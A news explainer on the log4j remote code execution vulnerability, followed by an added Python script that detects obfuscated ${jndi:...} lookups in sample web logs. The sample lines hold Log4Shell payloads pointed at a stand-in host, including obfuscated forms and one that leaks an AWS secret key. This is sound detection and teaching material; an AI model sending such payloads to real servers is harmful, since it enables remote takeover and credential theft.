“We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies — and signals to non-federal partners — to urgently patch or remediate this vulnerability,” CISA director Jen Easterly wrote in the statement. The bug is in a library called log4j, and the primary way for software engineers to protect a website or application from it is to upgrade the affected log4j 2.x library to a patched release (2.15.0 at the time of writing). “We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.”
The vulnerability was first discovered by Alibaba’s security team. Here’s what to know about the exploit and log4j.
Log4j is an open-source logging library used by Java programs to create a record of what an application has done. (Open-source code is published for anyone to read, so anyone can inspect it for bugs or vulnerabilities.)
“You want to create that record for a variety of different purposes, like being able to debug the application if something goes wrong, or be able to understand anything interesting about how the application was used,” explains Shuman Ghosemajumder, the global head of artificial intelligence at F5, an internet infrastructure and security company. “You can create your own mechanism within your own website or mobile app to record that information, or, you can use a logging program created by someone else, [like] log4j.”
The string is a lookup expression of the form ${jndi:...} that log4j evaluates when it turns up inside a logged message, such as a request header, a username, or a chat message. Think of it as a skeleton key: when a vulnerable server logs attacker-supplied text containing it, log4j contacts a server the attacker names, fetches code from there and runs it, so the attacker gets to run a program they control on the website’s server. In theory, that program could let them completely take over the website or application.
Attackers do not even need to pick targets by hand. They can scan every website on the internet, sending the special string in fields a server is likely to log (the User-Agent header, for example), and watch for the servers that respond by connecting back to the attacker’s machine.
“This is what’s called a remote code execution attack,” says Ghosemajumder. “One of the things that is particularly dangerous about this is that it can give a cyber attacker a very high level of access to websites and to your accounts.”
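Because the probe string has to pass through a web server's logs to do anything, those same logs are where defenders can spot it. The script below is an added example written for this article, not code from Popular Science or the log4j project: it scans constructed sample access-log lines for the ${jndi:...} lookup described above, first collapsing the ${lower:...}, ${upper:...} and ${...:-default} tricks scanners use to hide the keyword from naive string matching. The log lines, IP addresses and hosts are made up for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real traffic). Lines 2-5 carry the
# attack string, plain and obfuscated; lines 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 77 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.9/b}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.9/c}"',
    '203.0.113.10 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9/${env:AWS_SECRET_ACCESS_KEY}}"',
    '203.0.113.11 - - [10/Dec/2021:14:02:18 +0000] "GET /render?tpl=${title} HTTP/1.1" 200 90 "-" "curl/7.79"',
]

# An innermost ${...} lookup: no further "${" or "}" inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization: ${jndi:<scheme>:<target>}, e.g. ${jndi:ldap://host:1389/a}
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:/*([^/}\s]*)", re.IGNORECASE
)


def _resolve_inner(m: "re.Match[str]") -> str:
    """Collapse one innermost lookup the way log4j's substitutor would for the
    few lookups attackers use to disguise the word 'jndi'."""
    body = m.group(1)
    if ":-" in body:                       # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    name, sep, key = body.partition(":")
    if sep and name.lower() == "lower":    # ${lower:J} -> j
        return key.lower()
    if sep and name.lower() == "upper":    # ${upper:j} -> J
        return key.upper()
    return m.group(0)                      # unknown lookup: leave it in place


def normalize(value: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        new_value = _INNER.sub(_resolve_inner, value)
        if new_value == value:
            break
        value = new_value
    return value


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for a line that carries a JNDI lookup (severity 'jndi')
    or any other ${name:key} lookup worth a look (severity 'lookup'), else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m:
        return {"severity": "jndi", "scheme": m.group(1).lower(),
                "target": m.group(2), "normalized": norm}
    if re.search(r"\$\{[^}]*:[^}]*\}", norm):
        return {"severity": "lookup", "scheme": "", "target": "", "normalized": norm}
    return None


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines; each finding records the 1-based line number."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        hit = classify(line)
        if hit is not None:
            hit["line"] = number
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['severity']} scheme={f['scheme'] or '-'} "
              f"target={f['target'] or '-'}")
```

The target recorded for each hit is the host the victim would have connected back to, which is exactly what to block at the egress firewall and hunt for in outbound DNS and LDAP traffic. Normalization matters: lines 3 and 4 never contain the literal text "jndi", so a grep for that word misses them.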
Source : https://www.popsci.com/technology/log4j-software-vulnerability/